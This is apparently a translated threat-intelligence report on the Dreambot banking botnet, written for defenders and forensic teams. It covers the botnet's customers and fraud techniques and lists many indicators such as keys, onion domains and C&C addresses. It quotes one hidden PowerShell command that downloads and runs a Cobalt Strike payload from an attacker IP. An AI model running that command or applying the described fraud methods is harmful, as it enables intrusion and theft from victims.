Dreambot的终结？一篇关于Gozi心爱分支的悼文

Dreambot在活跃6年多后似乎终于停止服务。该僵尸网络的后端服务器已宕机数周，洋葱C&C服务器也已下线，自2020年3月以来未在野外发现新样本。

是缺乏新功能？Gozi新变种的激增？Zloader的迅猛崛起？还是COVID-19？我们无法确定具体死因，但越来越多迹象指向Dreambot的终结。

如今，深入了解僵尸网络历史对理解不断演变的网络犯罪产业比以往任何时候都更加重要。是时候分享我们在研究这一有趣恶意软件行动时学到的一些故事了。

什么是Dreambot？

Dreambot首次由IBM公开提及，后经Proofpoint和FoxIT详细分析，是一个主要用于银行欺诈的僵尸网络。基于泄露的ISFB源代码，Dreambot只是另一个Gozi分支，但有一个独特功能使其易于识别：支持Tor C&C服务器。

Dreambot是常见的银行木马，具备所有常规功能：

• Web注入
• VNC
• Socks
• 键盘记录
• 表单抓取
• 邮件窃取
• Cookie窃取
• 密码窃取
• 屏幕截图/视频
• 后门
• 引导工具包

正如Maciej Kotowicz所述，Dreambot与最近重新出现的另一个ISFB分支IAP非常相似。

商业模式

Dreambot采用传统商业模式。您向管理员付款，他们会给您一个C&C服务器、保护C&C域名的方法（DGA/P2P以及在Brazzzzers和Sandiflux/Fluxxy快速通量之间切换）以及一个未加密的构建，其中包含用于识别僵尸网络每个客户的专用SERPENT密钥。

基于此，Dreambot客户可以使用任何他想要的方式传播恶意软件并管理受害者。大多数情况下，客户会收到一个服务器作为C&C，并在合同结束前一直使用相同的IP地址。合同结束时，他的IP和SERPENT密钥会被另一个客户重用。

Dreambot运营商还为客户提供一个名为ICS的工具，用于创建、配置和加密他们的Web注入。它基于类似泄露的ISFB工具Config.exe。

Dreambot在日本与URLZone关联非常流行，也在世界其他地区使用：美国、加拿大、欧洲、亚洲、澳大利亚。

由于Dreambot客户群非常不稳定（有些客户只停留几个月），我们很可能也错过了许多不同的攻击活动。

活动示例：

• 伪装虚假DHL发票的复杂投放器分发Ursnif恶意软件
• DreamBot活动梦想远大
• 带有XLS附件的波兰恶意垃圾邮件推送Ursnif
• JPCERT/CC事件处理报告
• Dreambot（2019.11.13）——文档分析
• 新的Ursnif木马变种针对日本"数万用户"
• 通过简历主题电子邮件传递的Dreambot银行木马
• 新的Ursnif活动：从PowerShell转向Mshta
• IcedID银行木马与Ursnif/Dreambot合作分发
• 检测内容：发现Ursnif木马活动
• 针对捷克和斯洛文尼亚用户的银行木马
• 在线银行恶意软件"Dreambot"背后的攻击向量针对日本
• 恶意软件故事：Dreambot
• 恶意广告链导致HookAds活动。RIG投放Dreambot。
• HookAds投放的Dreambot
• 188.225.76.222的RIG EK投放Dreambot

客户波动性也使得难以衡量真实受害者数量，尽管我们统计仅2019年全球就有超过一百万次感染。

如果追踪Dreambot还不够困难，我们还观察到不同的Dreambot客户转售对其C&C的访问权限以共享欺诈。

当您尝试通过使用的SERPENT密钥识别Dreambot客户时，时间是一个非常重要的因素。由于密钥总是被重用，2017年的SERPENT密钥值可能（并且很可能）在2019年仍在使用，但并非由同一Dreambot客户使用。追踪Dreambot客户（或其他银行木马）的最佳方法可能是通过跟踪web注入配置。

野外观察到的SERPENT密钥示例：

1
2
3
4
5
6
7
8
9

00DONPORT77102090WAD
Gyh7SUCs1i2V0XOT6QaGzY7j9dhy10274948AOQPNTBB
36694321POIRYTRI
87654321POIUYTRE
87677321POIRYTRI
87694321POIRYTRI
A4F6421F93DF49AFA79CE7E04B4C9A6ACBA16FFC891E31A5DB23B3470D0CF889D
fei8OoQ0xhjTyqlGFL4R4F6Cw5nFYnAK74USJY728910OA1OvZz8XVH91INT7ekPHZ4OVL2QLI0N8WNq1a2z3w4s5x6e7d8
Qp1FMx2VswbqKjX0s4Sc9mDb35Ayj8oOV86iYRDA2FSEqWzLVm3hI8Nfe5xR0hPWY46frPcNAJQGl6KTKTXDkwvQHiBLP2OVdJReCsX8qWlhQ0kvWIdtM3YCfxhwrbV1

野外观察到的洋葱域名示例：

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18

2ud3gaufzaiikf3e.onion
aaxvkah7dudzoloq.onion
aeeeeeeeeeeeeeeeeeeeeeeeeeeeva.onion
cbt3milmkp32ou4w.onion
cxzko43pnr7ujnte.onion
erreg34983gy89g389g89459.onion
gfgyucg4ot3q3qno.onion
iod5tem372udbzu2.onion
kzuzxhlardmkvwwg.onion
ly3sxhs55czhsb3u.onion
s2mf5op7sjtonnkv.onion
voekeyq7k5vyeg4z.onion
wdwefwefwwfewdefewfwefw.onion
ey7kuuklgieop2pq.onion
jm2g6cyszkutaurp.onion
h33a7jzovxp2dxfg.onion
wuodygsb2cevqgh5.onion
6vcatkjlim35nscu.onion

Dreambot控制面板

随着时间的推移，我们观察到3个不同版本的Dreambot面板，始终托管在C&C的3000端口。每个客户似乎能够选择他们想要的面板版本。

该第一个版本直到2020年仍被客户使用。由Maciej Kotowicz在2016年披露，这个用Perl开发的面板简单但有效。所有功能都快速可供客户使用，具有不同的导出可能性和Jabber警报。该版本的最大问题可能是Perl如今难以维护，并且数据在数据库中的索引方式使得当操作者达到100,000个机器人时，服务器响应非常缓慢，尤其是键盘记录和表单抓取数据。

该Perl面板的更新已部署给一些客户。这是相同的机制，带有轻微的UI改进：

这两个版本都受相同的Web登录保护：

关于该登录页面的有趣事实：由Foxovsky开发的Rarog僵尸网络使用完全相同的登录页面。是巧合、合作还是复制粘贴？我们从未找到答案。

最后，最新版本的面板，用PHP从头开发并使用MongoDB数据库，是最常用的。

该面板的源代码似乎显示它是由一个新开发人员创建的，与恶意软件本身的开发无关：

该版本具有受VPN认证保护的大优势，使C&C更具弹性。

C&C有3个不同的开放端口：

• 333：由机器人用于联系网关
• 555：用于从C&C加载不同的二进制文件
• 3000：用于管理界面

Dreambot客户

如前所述，Dreambot被许多不同的信用卡诈骗者使用。有些团体使用了几周，而其他似乎从僵尸网络一开始就在那里。Dreambot曾经有很多客户，我们不会提及所有客户，只提及有趣的客户。

最有趣的故事来自早期采用者之一，一个使用Jer昵称的信用卡诈骗者。

“Jer"用作他的Dreambot C&C SSL证书的颁发者

Jer是Dreambot客户，几乎始终使用SERPENT密钥s4Sc9mDb35Ayj8oO和洋葱域名iod5tem372udbzu2[.]onion的构建。Jer是多年来使用URLZone传播Dreambot targeting日本银行（但不限于）的人。您可以在互联网上找到许多他的活动参考。

由Kafeine出色工作提供的Jer活动示例

Jer似乎扮演了比仅仅是Dreambot客户更高的角色。在监控新Dreambot客户期间，我们观察到每次信用卡诈骗者合同即将结束时，受其面板控制的受感染计算机将收到新配置，将它们路由到另一个Dreambot C&C - Jer的C&C。

2018年底，Jer处理来自世界各地的超过200,000个机器人，这些机器人收集自他自己的活动（大多数时间使用Cutwail垃圾邮件机器人）和前Dreambot客户。

我们设法观察到Jer欺诈世界各地不同的银行，这似乎甚至不是他的主要业务。

Dreambot的一个非常重要功能是能够向任何受感染的机器人投放第二阶段植入。该功能为操作者打开了各种机会。

在挖掘Jer 2018年的目标后，我们观察到各种受害者（政府组织、大型机构、大公司）同时被未知的第二阶段植入感染。该行为使我们认为Jer可能还向其他第三方转售对他一些有价值受害者的访问权限——这在信用卡诈骗者世界中非常常见且有利可图。

2018年底，Jer离开他的旧C&C，换了一个新服务器，带有最新版本的面板。他的旧服务器随后被一个新的、非常有趣的信用卡诈骗者使用。我们将称他为Bagsu。

Bagsu是一个老牌知名信用卡诈骗者，是不同僵尸网络（如Emotet、Zloader或Trickbot（和Trickbot Anchor）的客户，专注于他的业务：

• 针对德国银行
• 向其他信用卡诈骗者转售负载

Bagsu案例是一个很好的例子，展示了当您感染现代银行木马时期望的能力和TTP。

银行木马，但不仅如此

当您在防御团队进行取证时，了解您正在分析的恶意软件的能力以了解您正在分析的潜在漏洞范围非常重要。

当计算机感染银行木马时，调查员可能犯的最大错误是认为"没那么糟糕，这个用户无论如何不处理财务数据”——但现实要复杂得多。

银行木马首先是木马。大多数嵌入诸如web注入等功能，但这些木马的操作者将尝试通过每种可能的方式赚钱，即使受害者不处理财务数据。

Bagsu是此类货币化技术的完美示例，我们将展示随时间使用的所有不同方式。

Bagsu是一个个体，但也完全可能是一个信用卡诈骗团伙。信用卡诈骗不是感染数百万人，点击神奇"致富"按钮并拿钱。每个机器人都需要检查以了解如何从中获利，当您每天收到一千个新机器人时，几乎不可能独自工作。大多数时候，如果您想欺诈银行转账，您需要受害者在线并拥有他的智能手机，窃取2FA代码等。这是一个24/7的工作，不能仅由一个人完成。

当您分析像这样的C&C时，您可以看到几乎每个机器人都已被手动检查，并设置了评论以指示可进行的欺诈类型

此操作的复杂性表明背后更可能是信用卡诈骗团伙，而不是仅仅一个个体。

在此类欺诈操作背后，您通常有：

• 维护恶意软件的人（此处为Dreambot开发人员）
• 传播您恶意软件的人（漏洞利用工具包操作者、垃圾邮件发送者等）
• 分析每个机器人以识别如何从中窃取资金的人
• 从受害者导航到公司内部的网络操作者
• 参与特定欺诈的第三方，如勒索软件或BEC
• 各种洗钱网络

从这个单一的信用卡诈骗团伙，我们设法观察到Dreambot被用于：

• 直接银行欺诈
• 商店欺诈
• BEC欺诈
• 各种诈骗
• POS/酒店欺诈
• 勒索软件攻击

该行为适用于市场上所有主要的所谓银行木马。Dreambot、所有Gozi分支、Dridex、Trickbot、ZLoader、Danabot等，从来不是单一参与者，而是许多不同的信用卡诈骗团伙，具有许多不同的操作，但目标相同：赚钱。

在收集信用卡诈骗行业情报时要考虑的另一点是，大多数时候信用卡诈骗者不仅仅是单个银行木马的客户。正如我们将在Bagsu这里展示的，一些信用卡诈骗者通常是不同僵尸网络的同时客户。

经典银行欺诈

让我们描述Bagsu团伙实施的经典银行欺诈：直接银行欺诈。Bagsu团伙主要针对德国银行工作，但感谢Dreambot，他们还与第三方合作在美国、加拿大甚至罗马尼亚或波兰实施欺诈，以最大化利润。

这些攻击主要针对个人或公司，但我们也观察到Bagsu团伙使用Dreambot直接针对银行员工：

这很简单：分发Dreambot以感染人。感染后，web注入由Dreambot部署在受害者浏览器上，当该受害者登录在线银行服务时，凭据被拦截，以便随后由信用卡诈骗者重用。此行为如今已有充分记录，例如Jean-Ian Boutin的论文"The evolution of webinjects"。

但在2020年，从某人窃取在线银行凭据不足以窃取资金。如今几乎每家银行都部署大量启发式方法以查看使用这些凭据的计算机是否是真实用户。

您不能使用Tor浏览器登录银行账户。这样，银行将发出警报，账户将被暂停等待进一步调查。这就是为什么信用卡诈骗者使用到受害者计算机的VNC连接或SOCKS代理来隧道化他们的连接。

Dreambot通过设计提供这两种技术。当受害者被Dreambot感染时，VNC连接和/或SOCKS代理在受害者计算机上设置。

信用卡诈骗者在某处设置VNC和SOCKS服务器（在此示例中为185.212.149.162），每个Dreambot受害者通过专用端口连接到该服务器。当信用卡诈骗者需要实施欺诈时，他将使用该VNC服务器直接连接到受害者计算机，就像这样他将与受害者同时在同一台计算机上，在隐藏桌面上操作。

SOCKS或VNC在不同方式中可能有用。当您只想绕过本地化限制时，SOCKS代理就足够了。您可以拥有与受害者相同的IP并绕过本地化启发式方法。但如今大多数银行还实施其他指纹识别技术。如果您不使用具有相同插件的相同浏览器，您将很快以银行账户被冻结结束。这就是为什么如今信用卡诈骗者更喜欢使用VNC。

VNC是完美的技术，因为您使用与受害者完全相同的计算机，如今VNC转售是信用卡诈骗行业中一个被严重低估的业务。VNC"反向连接"通常被认为是低配置文件恶意软件，但许多银行欺诈来自此。如果信用卡诈骗者足够聪明，他甚至不需要使用web注入恶意软件欺诈银行，他只需要购买VNC IP列表并观察和/或投放不同的信息窃取器以了解如何欺诈受害者。

另一点重要的是，从取证的角度来看，VNC/SOCKS连接通常是攻击期间最容易捕捉的恶意行为。像explorer.exe或svchost这样的进程通过奇怪端口向服务器发送请求可能比Tor连接或C&C诱饵更容易检测。

让我们总结：

• Bagsu团伙用Dreambot感染目标。
• Dreambot提供所需的凭据/键盘记录/VNC/SOCKS
• Bagsu团伙使用VNC连接到在线银行账户以启动银行转账

即便如此，为了在2020年成功欺诈欧洲银行，您还需要通过受害者的智能手机拦截2FA代码。

为了绕过2FA，Bagsu团伙将使用Android恶意软件。当受害者浏览器被web注入注入并且该受害者将转到他的在线银行服务时，Bagsu团伙将使用web注入向受害者显示警报，说"如果您仍想使用我们的在线银行网站，现在必须安装我们的新移动应用程序"

用于诱骗受害者的web注入示例

该web注入将提议3种方式供受害者安装APK（Play商店外）：

• 通过SMS收到的链接
• 要扫描的QR码
• ADB操作

受害者收到的SMS示例

此恶意软件最近由IBM的Pavel Asinovsky描述并命名为TrickMo，因为它在Trickbot欺诈期间被捕获。

尽管IBM有出色的文章，但该Android恶意软件不幸不是Trickbot的专属部分。Bagsu团伙在某个时候是Dreambot和Trickbot的客户，并使用该恶意软件通过这两个僵尸网络欺诈银行。该APK是Bagsu团伙自至少2014年以来在众多僵尸网络上使用的工具。

该Android恶意软件的旧C&C供恶意软件古生物学家使用：

1
2
3
4

facebouk[.]net
web5401[.]com
178.79.145[.]141
webnat[.]host

现在，Bagsu团伙可以通过利用web注入启动恶意银行转账并通过钱骡网络洗钱来运行完整欺诈。

此欺诈的全貌显示了信用卡诈骗团伙使用的工具的复杂性。仅查看Dreambot、仅VNC连接或仅Android部分可能导致混淆的威胁情报归因，忽略与像Dreambot这样的恶意软件相关的不同工具之间的联系。

再次，该操作仅由Dreambot的一个客户运行，其他客户使用不同的TTP欺诈银行。我们观察到一些Dreambot客户在一个实例中使用Anubis Android恶意软件。

现在让我们看看Bagsu团伙使用Dreambot实施的第二种类型的经济欺诈——电子商务欺诈。

电子商务欺诈：新黄金

历史上，Bagsu擅长欺诈银行。该欺诈单独涉及许多技能，由于没有人能同时擅长所有事情，或者有时间一次做所有事情（所有这些信用卡诈骗者都是有真实生活问题如孩子等的人），他不得不雇佣各种合作伙伴以实施超出他能力范围的欺诈。这正是电子商务欺诈的情况。

欺诈电子商店与进行银行欺诈非常相似。最大区别在于从电子商店洗钱要容易得多。

为了组织他们的电子商务欺诈操作，Bagsu团伙支付了一个名为G25的"欺诈猴子"。他的角色是连接到Dreambot C&C并捕获（通过键盘记录数据、表单抓取数据、web注入等）每个使用电子商务平台（如eBay、Paypal或Amazon）的人。

游戏是检索例如Amazon账户，并使用这些账户订购有价值的商品（智能手机、笔记本电脑、视频游戏机、显卡）并将这些商品发送给某人，然后该人转售它们并返回"兑现"（干净）的钱。

与银行相比，电子商店设置的欺诈检测机制要少得多，因此大多数情况下SOCKS代理足以连接到受害者的Amazon账户。欺诈电子商店的问题在于其他地方。

当G25黑客攻击Amazon账户时，他不能只是从德国Amazon账户订购东西并将包裹发送到俄罗斯或中国的某个地方。由于欺诈检测启发式方法，此类订单将被阻止。这是一个比银行转账更大的问题，因为要实现它，您别无选择，只能让真实的人住在您的受害者附近接收货物。

雇佣人员拦截包裹、存储货物并转售它们本身就是一份全职工作。它涉及投入时间、承担风险和花钱。但由于信用卡诈骗行业，欺诈包裹超级容易。

基本上，G25需要某人（例如通过工作合同控制的骡子）尽可能靠近他的Amazon受害者居住。G25需要确保受害者将欺诈包裹发送给其他人而不提问且不偷窃欺诈包裹。被盗包裹是骡子业务中的一个大问题。最后，G25需要人员转售他的货物并将钱寄回给他。

由于信用卡诈骗行业的发展，这个复杂的计划如今很容易实施。您可以在那里找到许多服务，为您提供世界各地可以发送卡包地址。

此类服务处理一切：雇佣骡子、路由包裹和销售货物。您所要做的就是将包裹发送到该服务，您可以期望获得被盗货物价格的20%到50%。

互联网上存在许多类似服务，G25 over Dreambot经常使用一个名为"Stuffer"的服务：

G25只需选择最靠近受害者的包裹骡子，向Stuffer工作人员提供包裹标签并等待利润。这是一种简单且非常有效的欺诈和洗钱方式。

我们观察到通过Dreambot欺诈的大量包裹，但如今这是许多罪犯使用的非常常见的骗局，从信用卡诈骗者到密码窃取者操作者。

这是一种从受害者获利的简单方式，这些受害者不使用在线服务，但可以为欺诈者提供其他货币化机会。

现在让我们看看Bagsu团伙通过Dreambot使用的更复杂的获利方式。

销售点/酒店：信用卡诈骗聚宝盆

使用Dreambot，有各种机器人可用，允许攻击者在各种类型的受害者组织中建立立足点。但有些受害者对信用卡诈骗者比其他人更有价值。

酒店、餐厅或任何使用PoS终端的公司对于像Bagsu团伙这样的团队来说是真正的黄金。在各种安全性差的计算机系统上每天都有大量信用卡可用。

最大的问题是，被Dreambot感染的受害者很少使用餐厅或酒店PoS。该团伙需要识别哪些受害者有潜力，并在受害者组织内进行横向移动以获取对有价值计算机的访问权限。

这些攻击对网络犯罪分子具有高价值，并且对取证团队来说是纯粹的噩梦。

让我们以此为例：

您可以看到这里有一个Dreambot受害者于2018年11月14日被感染。Bagsu团伙迅速识别该端点作为酒店链的一部分，可能访问PoS终端。为了获取对这些PoS的访问权限，Bagsu需要投放一些横向移动工具。

11月20日（感染后6天）Bagsu决定向该受害者投放未知的第二阶段恶意软件以继续攻击。初始感染后6天的延迟使得研究人员难以依靠一次性沙箱引爆追踪Dreambot。从归因的角度来看，此案例也对取证团队构成了真正的噩梦。

每次Bagsu团伙需要横向移动时，他们使用相同类型的工具。大多数时候他们使用Cobalt Strike结合PyXie RAT。我们观察到Bagsu团伙运行的大量Cobalt Strike实例，用于感染公司内的其他人。

观察到的Cobalt Strike实例示例：

1
2
3
4
5
6
7
8

spineyes[.]club
185.147.15[.]13
cdn.greyrockland[.]com
195.88.208[.]76
94.156.189[.]217
app.yourcellphonebiz[.]com
js.choosebudget[.]com
192.254.66[.]108

我们故意不将这些Cobalt Strike实例归因于特定团体。请随意挖掘。

出于某些原因，Cobalt Strike并不总是用于在公司内移动。有时，使用更基本的技巧。其中一个技巧是电子邮件收件箱窃取器。

Bagsu团伙使用Dreambot投放电子邮件窃取器，任务是外泄受害者的收件箱和联系人列表。收件箱和联系人列表随后可用于制作"回复风格"电子邮件并在真实电子邮件讨论中间插入有效负载，以更好地诱骗受害者。

这些高级攻击执行起来更复杂，但当它们成功时，它们比传统的个人银行欺诈有利可图得多。

另一个例子说明为什么在不处理财务数据的计算机上感染"银行"木马仍然极其危险。Web注入当然是风险，但如这里所示，对公司来说远非最大风险。

让我们转到我们从Dreambot发起的最后一套欺诈示例。

BEC欺诈、勒索软件及更多

我们之前介绍了不同的、或多或少优雅的欺诈方法，但当然并非该团伙通过Dreambot实施的所有欺诈都是优雅的。

我们观察到Dreambot的功能被用于收集关于不同脆弱受害者的数据。该团伙有时使用Dreambot上的VNC针对不同的私人慈善机构和非政府组织。

游戏是访问受害者慈善机构的邮箱并发送电子邮件向通常的捐助者请求新的捐款。

1
2

大家好！！
几乎一年了！！我们正在为5月9日的生母节做准备。您愿意再次捐款吗？

在跳入捐助者和慈善机构之间的电子邮件交换后，假装是慈善机构的Dreambot操作者向潜在捐助者提到银行问题，并提供了新的（欺诈性）银行详细信息。捐助者然后将钱发送到犯罪银行账户，而慈善机构从未看到任何捐款。

简单但非常有效的攻击，再次感谢Dreambot进行。

攻击结束的另一个强大示例是部署勒索软件。这些攻击有时有充分记录，如Ryuk/Trickbot组合，不仅仅是Trickbot业务。我们可以在几乎每个大型僵尸网络中观察到这种行为，Dreambot也不例外。

我们观察到通过Dreambot结合Cobalt Strike进行的不同勒索软件攻击。

使用的勒索软件今天对我们仍然未知，但所有IOC指向围绕777组进行的操作：https://tehtris.com/en/ransom-war-1/

此勒索软件将我们带到Dreambot监控操作期间收集的最后一个有趣故事。

为了进行精心设计的勒索软件操作，通常重要的是确保您在受害者计算机上拥有最大可能的特权。罪犯可以使用许多技巧来实现这一点，最昂贵的可能是使用0day LPE。

在2019年12月17日通过Dreambot C&C进行的特定勒索软件攻击期间，我们观察到Bagsu团伙通过使用受害者计算机上的VNC并复制粘贴命令来投放通常的Cobalt Strike植入：

1

powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient .downloadstring ('http://192.254.66[.]108:80/a'))"

似乎Cobalt Strike不足以在受害者基础设施上获得所需特权，因此攻击者使用了另一种方法：本地权限提升漏洞利用，CVE-2019–1458。由于未知原因，攻击者既投放了构建的漏洞利用又投放了该漏洞利用的源代码：

该CVE由Kaspersky的AMR在APT操作上发布，仅在我们在该Dreambot操作上找到源代码前7天。

此示例显示了这些信用卡诈骗团伙利用一系列工具的能力，包括非常新鲜的1day漏洞利用。这使得归因如此困难，即使对于被认为是标准"银行木马"的Dreambot也是如此。

跟踪这些Dreambot操作向我们展示了各种信用卡诈骗和犯罪团伙之间关系网络的错综复杂。

从在德国进行银行欺诈的信用卡诈骗者开始，我们最终探索了网络犯罪生态系统所有部分之间现有联系的巨大网络。

这表明当将像Dreambot（或Trickbot、Zloader、Danabot、Emotet、所有Gozi）这样的操作视为单一、独特的操作时，完全归因确实是不可能的。

虽然今天Dreambot似乎已死，但我们已经看到Bagsu团伙现在是臭名昭著的ZLoader的大客户。

结论

在每个大型僵尸网络背后，有数百个不同的人以不同的TTP工作，同时有不同的目标。将僵尸网络作为一个操作分析可能导致许多错误。

请原谅笨拙的隐喻，但通过花费大部分精力将Dreambot（或Trickbot或Emotet）视为负责欺诈的唯一实体来打击网络犯罪，相当于试图通过花费大部分精力查看枪支品牌来解决谋杀案。

信用卡诈骗者今天仅将这些银行木马用作工具，因此如果Dreambot死亡，他们将继续他们的攻击，并仅为具有相同功能的另一个工具付费。这里的Bagsu团伙是一个很好的例子，在需要时成功从一个僵尸网络服务提供商切换到另一个。

仅针对银行欺诈跟踪Dreambot将导致错过该恶意软件几乎90%的真实攻击。我们试图在这里描述我们在Dreambot研究期间收集的一些有趣轶事，以帮助我们的取证和蓝队同事保护他们的基础设施。

通过仅关注工具而不是信用卡诈骗者来打击网络犯罪使罪犯非人化，使他们看起来像不可触碰的神话怪物。事实上，我们应该将网络罪犯视为人类，面临生活挑战，如有孩子或因COVID-19被困在家。

年复一年，威胁情报领域内出现了许多阴谋论。Dreambot在这里是一个很好的例子，由于缺乏Gozi演变的公开文档，该恶意软件今天仍被误认为是Ursnif。此外，Dreambot最初被认为是本地问题，而实际上它具有全球影响力。Dreambot操作也被认为是唯一实体，而实际上是多个客户同时操作的结果。

这是一个完整的行业，只要每个人都赚钱，罪犯就相互合作。他们都共享托管者、加壳器、VNC服务器，有时是来自C&C的一两个机器人，他们共享他们的钱骡网络、他们的web注入开发人员等。

今天的信用卡诈骗行业与APT业务一样复杂和强大。

但不要放弃信念 🙂

特别感谢Kafeine、Maciej Kotowicz、Fumik0_和Coldshell多年来在Dreambot和所有Gozi分支上的出色工作。没有他们，什么都不可能。